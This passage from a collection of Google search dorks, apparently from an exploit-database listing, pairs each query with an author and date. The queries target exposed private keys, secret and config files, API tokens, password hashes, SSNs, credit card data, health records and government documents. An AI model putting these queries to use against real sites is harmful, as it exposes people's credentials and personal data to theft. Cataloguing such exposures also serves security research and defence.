dork description: Dork to find sites likely running Social Network\r\nTabs plugin 1.7.1 for WordPress and likely affected by CVE-2018-20555 which\r\nallows remote attackers to discover Twitter access_token,\r\naccess_token_secret, consumer_key, and consumer_secret values by reading\r\nthe dcwp_twitter.php source code. This leads to Twitter account takeover.\r\n\r\nGoogle Search: inurl:\"dcwp_twitter.php\"\r\n\r\nSubmitted by: Alfie\r\n\r\nTwitter: https://twitter.com/emenalf\r\n\r\nWebsite: https://the-infosec.com\r\n\r\n-- \r\nRegards,\r\nAlfie.\r\nthe-infosec.com"}, {"dork": "intitle:\"index of\" \"secret.yaml\"", "description": "# Google Dork: intitle:\"index of\" \"secret.yaml\"\r\n# Description: K8s secret objects containing private data in base64 encoded\r\nformat (username, passwords, certificates, private keys, etc)\r\n# Exploit author: Vladimir Remenar"}, {"dork": "inurl:ftp -inurl:(http|https) intext:\"@gmail.com\" intext:subject fwd|confidential|important|CARD|cvv", "description": "# Dork: inurl:ftp -inurl:(http|https) intext:\"@gmail.com\" intext:subject fwd|confidential|important|CARD|cvv\r\n# Author: Aigo\r\n# Description: archived email conversations at times revealing full credit\r\n# card numbers and customer information as well as private company email\r\n# conversations."}, {"dork": "intext:cv OR intext:curriculum vitae AND intext:\"SSN\" ext:doc", "description": "intext:cv OR intext:curriculum vitae AND intext:\"SSN\" ext:doc \r\n\r\n# Google Dork: CV and SSN dork \r\n# Date: 18/03/21 \r\n# Author: cybersecstu\r\n\r\n\r\n Stu- Co-FounderTHE MANY HATS CLUB\r\nhttps://themanyhats.club@themanyhatsclub\r\n@cybersecstu"}, {"dork": "\"Parent Directory\" AND \"Index of\" AND \"config.php_old\"", "description": "# Google Dork: \"Parent Directory\" AND \"Index of\" AND \"config.php_old\"\r\n# Date: 20/03/2021\r\n# Exploit Author: Cuma KURT\r\n# Files Containing Juicy Info\r\n# The backup PHP config files reveal passwords and other important data.\r\n\r\nCuma KURT\r\n*Ethical Hacker | Information Security Engineer\r\nIstanbul - Turkey"}, {"dork": "intext:\"Your client connection\" + \"Network name\" + \"Hardware address\"", "description": "# Google Dork: intext:\"Your client connection\" + \"Network name\" + \"Hardware address\"\r\n\r\n# Cisco Meraki configuration panels with juicy info...\r\n\r\n# Date: 8/04/2021\r\n\r\n# Exploit Author: Alexandros Pappas"}, {"dork": "intitle:\"index of\" \"google-services.json\"", "description": "# Google Dork: intitle:\"index of\" \"google-services.json\"\r\n\r\n# File containing juicy info\r\n\r\n# Exploit Author: Dinesh Kumar"}, {"dork": "intitle:\"Index of\" ws_ftp.ini", "description": "Discription : The \"ws_ftp.ini\" file may contain usernames and passwords of\r\nFTP users. It may also displays parent directory."}, {"dork": "intitle:\"index of\" intext:\"senha\"", "description": "# Exploit Title: Files Containing Juicy Info\r\n# Google Dork: intitle:\"index of\" intext:\"senha\"\r\n# Date: 2021-05-21\r\n# Exploit Author: Aniket Prabhakar"}, {"dork": "site:.gov.co intitle:Index of", "description": "# Google Dork: site:.gov.co intitle:Index of\r\n\r\n# Files Containing Juicy Info\r\n\r\n# Date: 03/06/2021\r\n\r\n# Exploit Author: Om Satyarthi"}, {"dork": "site:*/phpmyadmin/server_sql.php", "description": "Files Containing Juicy info:\r\n\r\n\r\nsite:*/phpmyadmin/server_sql.php\r\n\r\nBR,\r\nReza Abasi (Turku)\r\nCyber Sec researcher"}, {"dork": "site:*/phpmyadmin/server_privileges.php", "description": "# Dork: Files Containing Juicy info:\r\n\r\n\r\nsite:*/phpmyadmin/server_privileges.php\r\nBR,\r\nReza Abasi (Turku)\r\nCyber Sec researcher"}, {"dork": "inurl:phpmyadmin/sql.php?server=1", "description": "Files Containing Juicy info:\r\n\r\ninurl:phpmyadmin/sql.php?server=1\r\n\r\nBR,\r\nReza Abasi (Turku)\r\nCyber Sec researcher"}, {"dork": "inurl:ALFA_DATA intitle:\"index of\"", "description": "# Google Dork: inurl:ALFA_DATA intitle:\"index of\"\r\n\r\n# Files Containing Juicy Info.\r\n\r\n# Date: 08/06/2021\r\n\r\n# Exploit Author: Snowglobe_io"}, {"dork": "inurl:/wp-content/uploads/ \"phpMyAdmin SQL Dump\"", "description": "# Google Dork: inurl:/wp-content/uploads/ \"phpMyAdmin SQL Dump\"\r\n\r\n# Files Containing Juicy Info\r\n\r\n# Exploit Author: Robotshell"}, {"dork": "inurl:/wp-content/uploads/wpdm-cache", "description": "# Google Dork: inurl:/wp-content/uploads/wpdm-cache\r\n\r\n# Files Containing Juicy Info\r\n\r\n# Exploit Author: Aftab Alam"}, {"dork": "site:*/phpmyadmin/server_databases.php", "description": "# Google Dork: site:*/phpmyadmin/server_databases.php\r\n\r\n# Files Containing Juicy Info\r\n\r\n# Exploit Author: Reza Abasi"}, {"dork": "index of storage/oauth-private.key", "description": "# Google Dork: index of storage/oauth-private.key\r\n\r\n# Files Containing Juicy Info\r\n\r\n# Exploit Author: Osman Arif"}, {"dork": "intitle:\"index of\" \"db.sqlite3\"", "description": "# Google Dork: intitle:\"index of\" \"db.sqlite3\"\r\n\r\n# Files Containing Juicy Info\r\n\r\n# Exploit Author: J. Igor Melo"}, {"dork": "intitle:\"index of\" \"/sql\"", "description": "# Google Dork: intitle:\"index of\" \"/sql\"\r\n\r\n# Files Containing Juicy Info\r\n\r\n# Exploit Author: J. Igor Melo"}, {"dork": "intitle:\"index of\" \"ssh_host_rsa_key\" + \"ssh_host_rsa_key.pub\"", "description": "# Google Dork: intitle:\"index of\" \"ssh_host_rsa_key\" + \"ssh_host_rsa_key.pub\"\r\n\r\n# Files Containing Juicy Info\r\n\r\n# Date: 23/07/2021\r\n\r\n# Exploit Author: Alexandros Pappas"}, {"dork": "\"Not for Public Release\" + \"Confidential\" ext:pdf | ext:doc | ext:xlsx", "description": "# Google Dork: \"Not for Public Release\" + \"Confidential\" ext:pdf | ext:doc\r\n| ext:xlsx\r\n\r\n# Files containing juicy info.\r\n\r\n# Date: 8/08/2021\r\n\r\n# Exploit Author: Alexandros Pappas"}, {"dork": "inurl:/inicis/ ext:log", "description": "# Google Dork: inurl:/inicis/ ext:log\r\n\r\n# Files Containing Juicy Info\r\n\r\n# Exploit Author: J. Igor Melo"}, {"dork": "inurl:wp-content/plugins/modern-events-calendar-lite", "description": "# Google Dork: inurl:wp-content/plugins/modern-events-calendar-lite\r\n# Date: 03/08/2021\r\n# Exploit Author: Pratik Gaikwad"}, {"dork": "intitle:untitled filetype:xls intext:password", "description": "# Google Dork: intitle:untitled filetype:xls intext:password\r\n# Files Containing Juicy Info\r\n# Date: 24/08/2021 \r\n# Exploit Author: Vaibhav Kumar Srivastava"}, {"dork": "filetype:xlsx intext:\"gmail.com\" OR \"hotmail.com\" site:gov", "description": "# Google Dork: filetype:xlsx intext:\"gmail.com\" OR \"hotmail.com\" site:gov\r\n# Files Containing Juicy Info\r\n# Date: 04/09/2021 \r\n# Exploit Author: Ujas Dhami"}, {"dork": "allintext:adhaar filetype:xlsx", "description": "# Google Dork: allintext:adhaar filetype:xlsx\r\n# Files Containing Juicy Info\r\n# Date: 04/09/2021 \r\n# Exploit Author: Seecko Das"}, {"dork": "intext:\"SECRET_KEY=\" site:pastebin.com", "description": "# Google Dork: intext:\"SECRET_KEY=\" site:pastebin.com\r\n# Files Containing Juicy Info\r\n# Date: 24/07/2021 \r\n# Exploit Author: J. Igor Melo"}, {"dork": "intext:\"private_key=\" site:pastebin.com", "description": "# Google Dork: intext:\"private_key=\" site:pastebin.com\r\n# Files Containing Juicy Info\r\n# Date: 24/07/2021 \r\n# Exploit Author: J. Igor Melo"}, {"dork": "intitle:\"index of\" \"/webpack-dev-server/ssl/\"", "description": "# Google Dork: intitle:\"index of\" \"/webpack-dev-server/ssl/\"\r\n# Files Containing Juicy info\r\n# Date: 23/07/2021\r\n# Exploit Author: Alexandros Pappas"}, {"dork": "intitle:\"index of\" \"/wp-content/uploads/\"", "description": "# Google Dork: intitle:\"index of\" \"/wp-content/uploads/\"\r\n# Files Containing Juicy Info\r\n# Date: 23/07/2021 \r\n# Exploit Author: Chrish"}, {"dork": "intext:\"API KEY\" site:pastebin.com", "description": "# Google Dork: intext:\"API KEY\" site:pastebin.com\r\n# Files Containing Juicy Info\r\n# Date: 24/07/2021 \r\n# Exploit Author: J. Igor Melo"}, {"dork": "intitle:\"Index of\" service.pwd", "description": "#Google Dork : intitle:\"Index of\" service.pwd\r\n#Description: Files Containing Juicy Info\r\n#Date: 02/08/2021\r\n#Exploit Author : Tanvir Imon"}, {"dork": "inurl:gov filetype:xls intext:password", "description": "# Google Dork: inurl:gov filetype:xls intext:password\r\n# Files Containing Juicy Info\r\n# Date: 16/09/2021 \r\n# Exploit Author: Cyber Shelby"}, {"dork": "intitle:\"index of\" \"irc.log\" | \"irc.logs\"", "description": "# Google Dork: intitle:\"index of\" \"irc.log\" | \"irc.logs\"\r\n# Files Containing Juicy Info\r\n# Date: 16/08/2021\r\n# Exploit Author: Alexandros Pappas"}, {"dork": "site:*/phpmyadmin/import.php", "description": "# Google Dork: site:*/phpmyadmin/import.php\r\n# Files Containing Juicy Info\r\n# Date:14/09/2021\r\n# Exploit Author: Reza Abasi"}, {"dork": "site:*/phpmyadmin/server_import.php", "description": "# Google Dork: site:*/phpmyadmin/server_import.php\r\n# Files Containing Juicy info\r\n# Date:14/09/2021\r\n# Exploit Author: Reza Abasi"}, {"dork": "intext:\"Welcome to Huawei web page for network configuration.\"", "description": "# Google Dork: intext:\"Welcome to Huawei web page for network configuration.\"\r\n# Files Containing Juicy Info\r\n# Date:31/08/2021\r\n# Exploit Author: J. Igor Melo"}, {"dork": "intitle: index of /bin/php.ini", "description": "# Google Dork: intitle: index of /bin/php.ini\r\n# Files Containing Juicy Info\r\n# Date:05/09/2021\r\n# Exploit Author: Arpan Chakraborty"}, {"dork": "intitle:\"LiveZilla Server Page\"", "description": "# Google Dork: intitle:\"LiveZilla Server Page\"\r\n# Files Containing Juicy Info\r\n# Date:31/08/2021\r\n# Exploit Author: J. Igor Melo"}, {"dork": "intitle: \"index of /files clients\"", "description": "# Google Dork: intitle: \"index of /files clients\"\r\n# Files Containing Juicy Info\r\n# Date:14/09/2021\r\n# Exploit Author: Romell Marin Cordoba"}, {"dork": "intitle:\"index of\" \"database.py\"", "description": "# Google Dork: intitle:\"index of\" \"database.py\"\r\n# Files Containing Juicy Info\r\n# Date:06/09/2021\r\n# Exploit Author: J. Igor Melo"}, {"dork": "inurl:/_vti_bin/Authentication.asmx", "description": "# Google Dork: inurl:/_vti_bin/Authentication.asmx\r\n# Files Containing Juicy Info\r\n# Date: 11/09/2021\r\n# Exploit Author: Anmol K Sachan"}, {"dork": "ext:txt intext:Windows PowerShell transcript start", "description": "# Google Dork: ext:txt intext:Windows PowerShell transcript start\r\n# Files Containing Juicy Info\r\n# Date:25/06/2021\r\n# Exploit Author: ahmed"}, {"dork": "intitle:\"index of\" \"tls-cert.pem\" | \"tls-csr.pem\" | \"tls-key.pem\"", "description": "# Google Dork: intitle:\"index of\" \"tls-cert.pem\" | \"tls-csr.pem\" | \"tls-key.pem\"\r\n# Juicy information (private keys).\r\n# Date: 23/07/2021\r\n# Exploit Author: Alexandros Pappas"}, {"dork": "intitle:\"index of\" \"development.py\"", "description": "# Google Dork: intitle:\"index of\" \"development.py\"\r\n# Files Containing Juicy Info\r\n# Date:06/09/2021\r\n# Exploit Author: J. Igor Melo"}, {"dork": "intitle:\"index of\" \"production.py\"", "description": "# Google Dork: intitle:\"index of\" \"production.py\"\r\n# Files Containing Juicy Info\r\n# Date:06/09/2021\r\n# Exploit Author: J. Igor Melo"}, {"dork": "intitle:\"index of\" \"local_settings.py\"", "description": "# Google Dork: intitle:\"index of\" \"local_settings.py\"\r\n# Files Containing Juicy Info\r\n# Date:06/09/2021\r\n# Exploit Author: J. Igor Melo"}, {"dork": "inurl:/admin/radeditorprovider/dialoghandler.aspx \"Loading the dialog...\"", "description": "# Google Dork: inurl:/admin/radeditorprovider/dialoghandler.aspx \"Loading\r\nthe dialog...\"\r\n# Files Containing Juicy Info\r\n# Date: 30/08/2021\r\n# Exploit Author: Red Blue Ops"}, {"dork": "phpMyAdmin -www filetype:conf site:*", "description": "# Google Dork: phpMyAdmin -www filetype:conf site:*\r\n# Files Containing Juicy Info\r\n# Date:05/09/2021\r\n# Exploit Author: Varsha Koli"}, {"dork": "Google Dork: intitle:index.of ipconfig", "description": "# Google Dork: intitle:index.of ipconfig\r\n# Files Containing Juicy Info\r\n# Date:21/09/2021\r\n# Exploit Author: Bon Sai"}, {"dork": "intext:\"Powered by SmarterTrack\"", "description": "# Google Dork: intext:\"Powered by SmarterTrack\"\r\n# Files Containing Juicy Info\r\n# Date:24/09/2021\r\n# Exploit Author: Red Blue Ops"}, {"dork": "inurl:/wp-content/themes/beach_apollo", "description": "# Google Dork: inurl:/wp-content/themes/beach_apollo\r\n# Files Containing Juicy Info\r\n# Date:28/09/2021\r\n# Exploit Author: Sagar Jain"}, {"dork": "intitle:GoogleService-Info filetype:plist", "description": "# Google Dork: intitle:GoogleService-Info filetype:plist\r\n# File Containing Juicy Info\r\n# Date: 15/09/2021 \r\n# Exploit Author: Madan Kumawat"}, {"dork": "intitle:\"Index of\" \"build-an-atom\"", "description": "# Google Dork: intitle:\"Index of\" \"build-an-atom\"\r\n# Files Containing Juicy Info\r\n# Date: 18/09/2021\r\n# Exploit Author: Mugdha Peter Bansode"}, {"dork": "inurl:\"robots\" | \"robot\" intext:\"Disallow:\" | \"Allow:\" ext:txt", "description": "# Dork: inurl:\"robots\" | \"robot\" intext:\"Disallow:\" | \"Allow:\" ext:txt\r\n# Files Containing Juicy Info\r\n# Date: 15/09/2021\r\n# Exploit Author: Aftab Alam\r\n\r\nDescription: This Dork shows all web pages that have a publicly disclosed \u201crobots.txt\u201d file, which contains a list of pages on the particular web server that should not be crawled to be indexed by search engines. By having access to this file, someone could possibly:\r\n\r\n 1. Know the pages that the web server owner intends to hide from search engine results\r\n 2. Know the pages that exist on the web server and are poorly hidden using this technique\r\n 3. Gain access to pages with privileged login portals (administrator, webmaster, etc.)"}, {"dork": "inurl:autodiscover/autodiscover.xml", "description": "# Google Dork: inurl:autodiscover/autodiscover.xml\r\n# Files Containing Juicy Info\r\n# Date:24/09/2021\r\n# Exploit Author: Javier Bernardo"}, {"dork": "intitle:\"index of\" \"robots.txt\"", "description": "# Google Dork: intitle:\"index of\" \"robots.txt\"\r\n# Files Containing Juicy Info\r\n# Date:28/09/2021\r\n# Exploit Author: Yash Singh"}, {"dork": "intitle:\"index of\" \"development.js\"", "description": "# Google Dork: intitle:\"index of\" \"development.js\"\r\n# Files Containing Juicy Info\r\n# Date:26/09/2021\r\n# Exploit Author: Abhinav Anand"}, {"dork": "intext:Authorization: Bearer filetype:log", "description": "# Google Dork: intext:Authorization: Bearer filetype:log\r\n# Files Containing Juicy Info\r\n# Date: 22/09/2021\r\n# Exploit Autor: Matheus Bolela"}, {"dork": "intitle.index of .env", "description": "# Google Dork: intitle.index of .env\r\n# Files Containing Juicy Info\r\n# Date:24/09/2021\r\n# Exploit Author: Sugavanam D"}, {"dork": "intitle:index.of root user", "description": "# Google Dork: intitle:index.of root user\r\n# Files Containing Juicy Info\r\n# Date:21/09/2021\r\n# Exploit Author: Bon Sai"}, {"dork": "intitle:\"Operations Automation Default Page\"", "description": "# Google Dork: intitle:\"Operations Automation Default Page\"\r\n# Files Containing Juicy Info\r\n# Date:29/09/2021\r\n# Exploit Author: J. Igor Melo"}, {"dork": "intext:\"Powered by YzmCMS\"", "description": "# Google Dork: intext:\"Powered by YzmCMS\"\r\n# Files Containing Juicy Info\r\n# Date:27/09/2021\r\n# Exploit Author: J. Igor Melo"}, {"dork": "intitle:\"index of\" \"sourcecode\"", "description": "# Google Dork: intitle:\"index of\" \"sourcecode\"\r\n# Files Containing Juicy Info\r\n# Date:27/09/2021\r\n# Exploit Author: ethicalsubbu"}, {"dork": "# Exploit Title: [SF Dork]", "description": "# Google Dork: # Exploit Title: [SF Dork]\r\n# Files Containing Juicy Info\r\n# Date:29/09/2021\r\n# Exploit Author: Teddy"}, {"dork": "inurl:/wp-content/themes/striking_r", "description": "# Google Dork: inurl:/wp-content/themes/striking_r\r\n# Files Containing Juicy Info\r\n# Date:28/09/2021\r\n# Exploit Author: Sagar Jain"}, {"dork": "inurl:/wp-content/themes/avada", "description": "# Google Dork: inurl:/wp-content/themes/avada\r\n# Files Containing Juicy Info\r\n# Date:28/09/2021\r\n# Exploit Author: Sagar Jain"}, {"dork": "inurl:/wp-content/themes/centum", "description": "# Google Dork: inurl:/wp-content/themes/centum\r\n# Files Containing Juicy Info\r\n# Date:28/09/2021\r\n# Exploit Author: Sagar Jain"}, {"dork": "inurl:/wp-content/themes/ultimatum", "description": "# Google Dork: inurl:/wp-content/themes/ultimatum\r\n# Files Containing Juicy Info\r\n# Date:28/09/2021\r\n# Exploit Author: Sagar Jain"}, {"dork": "inurl:/wp-content/themes/IncredibleWP", "description": "# Google Dork: inurl:/wp-content/themes/IncredibleWP\r\n# Files Containing Juicy Info\r\n# Date:28/09/2021\r\n# Exploit Author: Sagar Jain"}, {"dork": "inurl:/wp-content/plugins/wp-e-commerce", "description": "# Google Dork: inurl:/wp-content/plugins/wp-e-commerce\r\n# Files Containing Juicy Info\r\n# Date:28/09/2021\r\n# Exploit Author: Sagar Jain"}, {"dork": "intitle: \"index\" inurl: log", "description": "# Google Dork: intitle: \"index\" inurl: log\r\n# Files Containing Juicy Info\r\n# Date:26/09/2021\r\n# Exploit Author: adreeta maity"}, {"dork": "allintitle:Index of /wp-includes/", "description": "# Google Dork: allintitle:Index of /wp-includes/\r\n# Files Containing Juicy Info\r\n# Date:24/09/2021\r\n# Exploit Author: Raj Zamal"}, {"dork": "intext:private_key filetype:log", "description": "# Google Dork: intext:private_key filetype:log\r\n# Files Containing Juicy Info\r\n# Date:22/09/2021\r\n# Exploit Author: Matheus Bolela"}, {"dork": "intext:api_key filetype:log", "description": "# Google Dork: intext:api_key filetype:log\r\n# Files Containing Juicy Info\r\n# Date:22/09/2021\r\n# Exploit Author: Matheus Bolela"}, {"dork": "inurl: /admin/webeditor/admin_login.asp", "description": "# Google Dork: inurl: /admin/webeditor/admin_login.asp\r\n# Files Containing Juicy Info\r\n# Date:12/09/2021\r\n# Exploit Author: Romell Marin Cordoba"}, {"dork": "inurl:sap/public/bc", "description": "# Google Dork: inurl:sap/public/bc\r\n# Files Containing Juicy Info\r\n# Date:28/09/2021\r\n# Exploit Author: Javier Bernardo"}, {"dork": "intext:\"docs.google.com/forms/d/\"", "description": "# Google Dork: intext:\"docs.google.com/forms/d/\"\r\n# Files Containing Juicy Info\r\n# Date:28/09/2021\r\n# Exploit Author: Rodrigo Ferreira"}, {"dork": "intitle:\" index of \" \"/BigIp\"", "description": "# Google Dork: intitle:\" index of \" \"/BigIp\"\r\n# Files Containing Juicy Info\r\n# Date:26/09/2021\r\n# Exploit Author: AFFAN AHMED"}, {"dork": "intitle:\"index of\" \"robots.txt\"", "description": "# Google Dork: intitle:\"index of\" \"robots.txt\"\r\n# Files Containing Juicy Info\r\n# Date:29/09/2021\r\n# Exploit Author: Yash Singh"}, {"dork": "intext:\"Number of Requests for items accessed on this Server\"", "description": "# Google Dork: intext:\"Number of Requests for items accessed on this Server\"\r\n# Files Containing Juicy Info\r\n# Date:30/09/2021\r\n# Exploit Author: Yash Singh"}, {"dork": "allintext:\"[Sec. Info]\" file.php", "description": "# Google Dork: allintext:\"[Sec. Info]\" file.php\r\n# Files Containing Juicy Info\r\n# Date:02/08/2021\r\n# Exploit Author: Adam Wallwork"}, {"dork": "allintext:\"Call to undefined function\"", "description": "# Google Dork: allintext:\"Call to undefined function\"\r\n# Files Containing Juicy Info\r\n# Date:02/08/2021\r\n# Exploit Author: Adam Wallwork"}, {"dork": "intitle: \"Index of ipcam\"", "description": "# Google Dork: intitle: \"Index of ipcam\"\r\n# Files Containing Juicy Info\r\n# Date:1/10/2021\r\n# Exploit Author: Romell Marin Cordoba"}, {"dork": "intitle: \"index of data clinic\"", "description": "# Google Dork: intitle: \"index of data clinic\"\r\n# Files Containing Juicy Info\r\n# Date:01/10/2021\r\n# Exploit Author: Romell Marin Cordoba"}, {"dork": "intitle:\"index of\" \"mongod.conf\"", "description": "# Google Dork: intitle:\"index of\" \"mongod.conf\"\r\n# Files Containing Juicy Info\r\n# Date:30/09/2021\r\n# Exploit Author: Suman Das"}, {"dork": "intitle:\"index of \" inurl:\".bash_profile \"", "description": "# Google Dork: intitle:\"index of \" inurl:\".bash_profile \"\r\n# Files Containing Juicy Info\r\n# Date:21/09/2021\r\n# Exploit Author: Deven Rathod"}, {"dork": "intitle:\"index of\" \"config.json\"", "description": "# Google Dork: intitle:\"index of\" \"config.json\"\r\n# Files Containing Juicy Info\r\n# Date:01/10/2021\r\n# Exploit Author: Suman Das"}, {"dork": "intitle:\"index of\" \"docker-compose.yaml\"", "description": "# Google Dork: intitle:\"index of\" \"docker-compose.yaml\"\r\n# Files Containing Juicy Info\r\n# Date:01/10/2021\r\n# Exploit Author: Suman Das"}, {"dork": "inurl:execute-api site:amazonaws.com", "description": "# Google Dork: inurl:execute-api site:amazonaws.com\r\n# Files Containing Juicy Info\r\n# Date:02/10/2021\r\n# Exploit Author: Juan Christian"}, {"dork": "intitle:index of django.config", "description": "# Google Dork: intitle:index of django.config\r\n# Files Containing Juicy Info\r\n# Date:02/10/2021\r\n# Exploit Author: Asif Mohammad Khan"}, {"dork": "intitle:\"index of\" inurl:gov Juicy Info |GHDB", "description": "# Google Dork: intitle:\"index of\" inurl:gov Juicy Info |GHDB\r\n# Files Containing Juicy Info\r\n# Date:02/10/2021\r\n# Exploit Author: Parul Gulati"}, {"dork": "intitle: \"index of Health Records\"", "description": "# Google Dork: intitle: \"index of Health Records\"\r\n# Files Containing Juicy Info\r\n# Date:01/10/2021\r\n# Exploit Author: Romell Marin Cordoba"}, {"dork": "intitle:\"index of\" \"/api-debug.log\"", "description": "# Google Dork: intitle:\"index of\" \"/api-debug.log\"\r\n# Files Containing Juicy Info\r\n# Date:11/08/2021\r\n# Exploit Author: Chirag Samant"}, {"dork": "site:pastebin.com intext:\"-----BEGIN CERTIFICATE-----\"", "description": "# Google Dork: site:pastebin.com intext:\"-----BEGIN CERTIFICATE-----\"\r\n# Files Containing Juicy Info\r\n# Date:30/09/2021\r\n# Exploit Author: Aftab Alam"}, {"dork": "site:pastebin.com intext:\"-----BEGIN RSA PRIVATE KEY-----\"", "description": "# Google Dork: site:pastebin.com intext:\"-----BEGIN RSA PRIVATE KEY-----\"\r\n# Files Containing Juicy Info\r\n# Date:30/09/2021\r\n# Exploit Author: Aftab Alam"}, {"dork": "site:pastebin.com intext:\":aad3b435b51404eeaad3b435b51404ee:\"", "description": "# Google Dork: site:pastebin.com intext:\":aad3b435b51404eeaad3b435b51404ee:\"\r\n# Files Containing Juicy Info\r\n# Date:30/09/2021\r\n# Exploit Author: Aftab Alam"}, {"dork": "intitle:\"index of\" \"schema.graphql\"", "description": "# Google Dork: intitle:\"index of\" \"schema.graphql\"\r\n# Files Containing Juicy Info\r\n# Date:18/07/2021\r\n# Exploit Author: J. Igor Melo"}, {"dork": "site:.execute-api.us-east-1.amazonaws.com", "description": "# Google Dork: site:.execute-api.us-east-1.amazonaws.com\r\n# Files Containing Juicy Info\r\n# Date: 24/10/2021 \r\n# Exploit Author: Lutzenfried"}, {"dork": "inurl:employee filetype:xls", "description": "# Google Dork: inurl:employee filetype:xls\r\n# Files Containing Juicy Info\r\n# Date:02/10/2021\r\n# Exploit Author: Ashim Chaudhary"}, {"dork": "ext:xls intext:/etc/passwd | inurl:password", "description": "# Google Dork: ext:xls intext:/etc/passwd | inurl:password\r\n# Files Containing Juicy Info\r\n# Date:22/09/2021\r\n# Exploit Author: Mostafa Tamam"}, {"dork": "\"index of\" intext:wpbdp-csv-exports", "description": "# Google Dork: \"index of\" intext:wpbdp-csv-exports\r\n# Files Containing Juicy Info\r\n# Date:23/09/2021\r\n# Exploit Author: Serdar D."}, {"dork": "inurl:mil intext:\"UNCLASSIFIED/FOUO\" ext:pdf", "description": "# Google Dork: inurl:mil intext:\"UNCLASSIFIED/FOUO\" ext:pdf\r\n# Files Containing Juicy Info\r\n# Date: 03/10/2021 \r\n# Exploit Author: Stuart Steenberg"}, {"dork": "filetype:log \"AUTHTOKEN\"", "description": "# Google Dork: filetype:log \"AUTHTOKEN\"\r\n# Files Containing Juicy Info\r\n# Date:23/09/2021\r\n# Exploit Author: Matheus Bolela"}, {"dork": "intitle:\"index of\" \"mysql.yaml\"", "description": "# Google Dork: intitle:\"index of\" \"mysql.yaml\"\r\n# Files Containing Juicy Info\r\n# Date: 04/10/2021 \r\n# Exploit Author: Suman Das"}, {"dork": "site:*/oauth/token", "description": "# Google Dork: site:*/oauth/token\r\n# Files Containing Juicy Info\r\n# Date:04/10/2021\r\n# Exploit Author: reza abasi"}, {"dork": "intitle:\"index of\" \"sftp.json\"", "description": "# Google Dork: intitle:\"index of\" \"sftp.json\"\r\n# Files Containing Juicy Info\r\n# Date:04/10/2021\r\n# Exploit Author: Suman Das"}, {"dork": "inurl:simplesaml/saml2/idp", "description": "# Google Dork: inurl:simplesaml/saml2/idp\r\n# Files Containing Juicy Info\r\n# Date: 04/10/2021\r\n# Exploit Author: Javier Bernardo"}, {"dork": "\".:/opt/remi/php56/root/usr/share/pear\" | \":/opt/remi/php56/root/usr/share/php\"", "description": "# Google Dork: \".:/opt/remi/php56/root/usr/share/pear\" | \":/opt/remi/php56/root/usr/share/php\"\r\n# Files Containing Juicy Info\r\n# Date: 28/09/2021 \r\n# Exploit Author: MiningOmerta\r\n#Description: Path disclosure, outdated PHP version disclosure, service disclosure, and virtualenv within the service disclosure"}, {"dork": "\"boarding pass\" site:http://tripadvisor.com", "description": "# Google Dork: \"boarding pass\" site:http://tripadvisor.com\r\n# Files Containing Juicy Info\r\n# Date:06/10/2021\r\n# Exploit Author: Allan Jay Dumanhug"}, {"dork": "intitle:index de sshd_config", "description": "# Google Dork: intitle:index de sshd_config\r\n# Files Containing Juicy Info\r\n# Date: 06/10/2021 \r\n# Exploit Author: Naman Shah"}, {"dork": "site:pastebin.com intext:root: & :0: & ::: | intitle:passwd | shadow", "description": "# Google Dork: site:pastebin.com intext:root: & :0: & ::: | intitle:passwd | shadow\r\n# Files Containing Juicy Info\r\n# Date: 07/10/2021 \r\n# Exploit Author: Arav Budhiraja"}, {"dork": "intitle:\"Index of\" \"Apache/2.4.49\"", "description": "# Google Dork: intitle:\"Index of\" \"Apache/2.4.49\"\r\n# Files Containing Juicy Info\r\n# Date:08/10/2021\r\n# Exploit Author: Shell Reaper"}, {"dork": "intitle: \"access log\" filetype: txt", "description": "# Google Dork: intitle: \"access log\" filetype: txt\r\n# Files Containing Juicy Info\r\n# Date: 8/10/2021 \r\n# Exploit Author: Zeshan Ahmad"}, {"dork": "intitle:\"index of\" \"credentials\"", "description": "# Google Dork: intitle:\"index of\" \"credentials\"\r\n# Files Containing Juicy Info\r\n# Date:08/10/2021\r\n# Exploit Author: ethicalsubbu"}, {"dork": "site:pastebin.com intitle:\"leak\" | \"breach\" intext:\"password\" | \"pw\" | \"pwd\"", "description": "# Google Dork: site:pastebin.com intitle:\"leak\" | \"breach\" intext:\"password\" | \"pw\" | \"pwd\"\r\n# Files Containing Juicy Info\r\n# Date:08/10/2021\r\n# Exploit Author: Aftab Alam"}, {"dork": "\"Warehouse Management System\" Ext:pdf site:.gov", "description": "# Google Dork: \"Warehouse Management System\" Ext:pdf site:.gov\r\n# Files Containing Juicy Info\r\n# Date:09/10/2021\r\n# Exploit Author: Tyler Draughn"}, {"dork": "intitle: \"index of\" \"admin\" \"/backup\"", "description": "# Google Dork: intitle: \"index of\" \"admin\" \"/backup\"\r\n# Files Containing Juicy Info\r\n# Date:09/10/2021\r\n# Exploit Author: Roshdy Essam"}, {"dork": "intitle: \"Library System by YahooBaba\"", "description": "# Google Dork: intitle: \"Library System by YahooBaba\"\r\n# Files Containing Juicy Info\r\n# Date:10/10/2021\r\n# Exploit Author: Red Blue Ops"}, {"dork": "inurl:/wp-content/plugins/thecartpress/", "description": "# Google Dork: inurl:/wp-content/plugins/thecartpress/\r\n# Files Containing Juicy Info\r\n# Date:10/10/2021\r\n# Exploit Author: Red Blue Ops"}, {"dork": "inurl:/wp-content/plugins/mstore-api/", "description": "# Google Dork: inurl:/wp-content/plugins/mstore-api/\r\n# Files Containing Juicy Info\r\n# Date:10/10/2021\r\n# Exploit Author: Red Blue Ops"}, {"dork": "inurl:/plugins/pie-register/", "description": "# Google Dork: inurl:/plugins/pie-register/\r\n# Files Containing Juicy Info\r\n# Date:10/10/2021\r\n# Exploit Author: Red Blue Ops"}, {"dork": "filetype:log intext:(\"apache2\" | \"htdocs\")", "description": "# Google Dork: filetype:log intext:(\"apache2\" | \"htdocs\")\r\n# Files Containing Juicy Info\r\n# Date:09/10/2021\r\n# Exploit Author: Ritik Sahni"}, {"dork": "intext:\"index of/\" \"client-1.0-SNAPSHOT\"", "description": "# Google Dork: intext:\"index of/\" \"client-1.0-SNAPSHOT\"\r\n# Files Containing Juicy Info\r\n# Date:12/10/2021\r\n# Exploit Author: Yash Singh"}, {"dork": "intitle:\"phpinfo()\" inurl:\"phpinfo.php\"", "description": "# Google Dork: intitle:\"phpinfo()\" inurl:\"phpinfo.php\"\r\n# Files Containing Juicy Info\r\n# Date:11/10/2021\r\n# Exploit Author: Michael Felix"}, {"dork": "intitle:\"index of\" \"passwords\" gov", "description": "# Google Dork: intitle:\"index of\" \"passwords\" gov\r\n# Files Containing Juicy Info\r\n# Date:11/10/2021\r\n# Exploit Author: Syed Sadam"}, {"dork": "New Dork", "description": "# 